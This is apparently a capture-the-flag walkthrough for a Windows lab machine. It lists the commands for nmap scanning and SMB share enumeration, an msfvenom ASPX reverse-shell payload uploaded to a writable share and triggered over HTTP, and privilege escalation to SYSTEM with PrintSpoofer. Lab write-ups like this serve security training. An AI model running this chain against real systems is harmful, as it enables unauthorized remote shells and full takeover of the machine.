Pre-Engagement Briefing

User Flag

First you should scan the ports of the attacked server by running nmap -A -p- IP. You will see that the smb-ports are open. To check the smb-shares run smb-client -L \\\\IP. You will see some standard-shares and a share called nt4wrksv to check the share run smb-client \\\\IP\\nt4wrksv. In the share you find a file called "passwords.txt", this file is not of any importance however. More important: You can upload files to the share. To make any use of this we have to figure out if we can access the files in the share. The nmap-results have shown that there are 2 ports using http. By checking these ports with your browser you will figure out that you can access files using the port 49663. To exploit this you have to create a reverse-shell by running msfvenom -p windows/x64/shell/reverse_tcp LHOST=IP LPORT=PORT -f aspx -o shell.aspx. After you created the shell you can upload the shell by using smb-client and put shell.aspx. You can start the uploaded shell by accessing it in your browser by navigating to "IP:49663/nt4wrksv/shell.aspx". After the shell is established run more \Users\Bob\Desktop\user.txt` to get the flag.

Root Flag

To gain access to the root-flag we have to escalate our privileges. First we should check what privileges we have. To do so run whoami /priv. With the list of privileges we can search for tools and techniques to gain more privileges. I stumbled over the "PrintSpoofer"-Tool by itm4n. By uploading and executing this tool I was able to get a shell as "nt authority\system". After gaining this shell you can run more \Users\Administrator\Desktop\root.txt to get the flag.